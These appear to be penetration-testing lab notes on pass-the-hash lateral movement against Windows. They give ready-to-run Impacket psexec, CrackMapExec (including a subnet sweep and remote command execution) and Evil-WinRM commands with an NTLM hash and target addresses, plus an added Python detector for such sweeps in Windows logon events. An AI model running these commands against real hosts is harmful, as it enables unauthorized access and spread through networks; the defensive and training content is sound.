Using Linux

Using Impacket

  • impacket-wmiexec

  • impacket-atexec

  • impacket-smbexec

  • impacket-psexec

$ impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

Using CrackMapExec

  • use --local-auth to authenticate as a local administrator account

# crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
# crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
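
From the defender's side, the subnet-wide run above appears on each target as a network logon (Security event 4624, logon type 3) over NTLM for a local account, all from one source address. The Python below is an added example, not part of the original notes; the event records are constructed, and it assumes a local-account logon records the host's own name in TargetDomainName.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(time, computer, src, user, domain, pkg="NTLM", logon_type=3):
    """Build one constructed record using Security event 4624 field names."""
    return {"TimeCreated": time, "Computer": computer, "IpAddress": src,
            "TargetUserName": user, "TargetDomainName": domain,
            "AuthenticationPackageName": pkg, "LogonType": logon_type}

# Constructed sample data, not taken from the page or from a real network.
EVENTS = [
    ev("2024-01-10T09:00:01", "WS01", "172.16.1.5", "Administrator", "WS01"),
    ev("2024-01-10T09:00:03", "WS02", "172.16.1.5", "Administrator", "WS02"),
    ev("2024-01-10T09:00:04", "SRV03", "172.16.1.5", "Administrator", "SRV03"),
    ev("2024-01-10T09:01:00", "WS01", "172.16.1.9", "jsmith", "CORP", pkg="Kerberos"),
    ev("2024-01-10T09:02:00", "WS02", "172.16.1.20", "helpdesk", "WS02"),
    ev("2024-01-10T08:00:00", "WS01", "172.16.1.30", "Administrator", "WS01"),
    ev("2024-01-10T11:00:00", "WS02", "172.16.1.30", "Administrator", "WS02"),
    ev("2024-01-10T14:00:00", "SRV03", "172.16.1.30", "Administrator", "SRV03"),
]

def is_local_ntlm_network_logon(e):
    """Remote type 3 logon over NTLM where the account domain is the host itself."""
    return (e["LogonType"] == 3
            and e["AuthenticationPackageName"].upper() == "NTLM"
            and e["TargetDomainName"].upper() == e["Computer"].upper()
            and e["IpAddress"] not in ("-", "127.0.0.1", "::1"))

def find_sweeps(events, min_hosts=3, window=timedelta(minutes=5)):
    """Return {(source_ip, account): hosts} where one source used the same
    local account over NTLM on at least min_hosts hosts inside the window."""
    by_key = defaultdict(list)
    for e in events:
        if is_local_ntlm_network_logon(e):
            key = (e["IpAddress"], e["TargetUserName"].lower())
            by_key[key].append((datetime.fromisoformat(e["TimeCreated"]),
                                e["Computer"].upper()))
    hits = {}
    for key, logons in by_key.items():
        logons.sort()
        for start, _ in logons:
            hosts = {h for t, h in logons if start <= t <= start + window}
            if len(hosts) >= min_hosts:
                hits[key] = sorted(hosts)
                break
    return hits

if __name__ == "__main__":
    for (src, user), hosts in find_sweeps(EVENTS).items():
        print(f"{src} used local account '{user}' over NTLM on {hosts}")
```

The thresholds (three hosts, five minutes) are illustrative and should be tuned against legitimate management tooling that also logs on with local accounts.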

Using Evil-WinRM

  • use if SMB is blocked or if we don't have administrative rights

  • when using a domain account, include the domain name, such as administrator@inlanefreight.htb

$ evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

Using RDP

  • Restricted Admin Mode must be enabled on the target; if it is not, the connection fails with an error

  • to enable restricted admin mode, use this command to add a registry key

Pass the hash using RDP
